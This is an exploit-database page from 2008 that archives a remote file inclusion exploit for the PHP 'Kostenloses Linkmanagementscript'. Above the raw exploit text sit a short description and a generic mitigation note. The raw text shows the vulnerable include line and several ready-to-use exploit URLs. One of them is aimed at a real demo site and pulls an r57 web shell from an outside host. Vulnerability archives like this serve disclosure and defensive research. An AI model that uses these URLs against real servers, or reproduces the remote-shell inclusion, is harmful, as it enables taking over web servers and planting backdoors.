header-logo
Suggest Exploit
vendor:
Kostenloses Linkmanagementscript
by:
HaCkeR_EgY
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Kostenloses Linkmanagementscript
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Remote File Inclusion Vulnerability Kostenloses Linkmanagementscript

A remote file inclusion vulnerability exists in Kostenloses Linkmanagementscript, which allows an attacker to include a remote file on the web server. This is due to a lack of proper validation of user-supplied input to the 'main_page_directory' and 'page_to_include' parameters in the 'index.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script, which will include the malicious file on the web server.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files. Additionally, the web server should be configured to only serve files from a specific directory.
Source

Exploit-DB raw data:

############################################
#   Remote File Inclusion Vulnerability    #
#     Kostenloses Linkmanagementscript     #   
############################################    
 
 
## Author : HaCkeR_EgY
 
## C0NTACT : hacker_egy@hotmail.com
 
## H^OME : www.PAL-HaCkeR.com   &  ATSDP.COM
 
## Scripte Name : Kostenloses Linkmanagementscript
 
## download scripte :  http://scripte.phpway.de/
 
## Downloads: 2458

########################################################################
================================================================================
## VuRn C0DE :
 
Line 91 :
<?php
include($main_page_directory.$page_to_include);
?>
 
## ExPL0!T :
                1=====>>http://www.target.de/script/template\index.php?main_page_directory=  Ev!L C0dE
                2=====>>http://www.target.de/script/template\index.php?page_to_include=  Ev!L C0dE
 
## L!ve DeM0 :
             
        =======>>http://scripte.phpway.de/demo/template\index.php?page_to_include=http://captshino.tripod.com/r57.txt?
 
 
################################################################################
[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "
 
[<>] Greetz : Mr.SQL , Mohamed el Arab ,F!resell, DaRk MaStEr , H-T Team , Stack-Terrorist , str0ke
 
#################################################################################

# milw0rm.com [2008-05-14]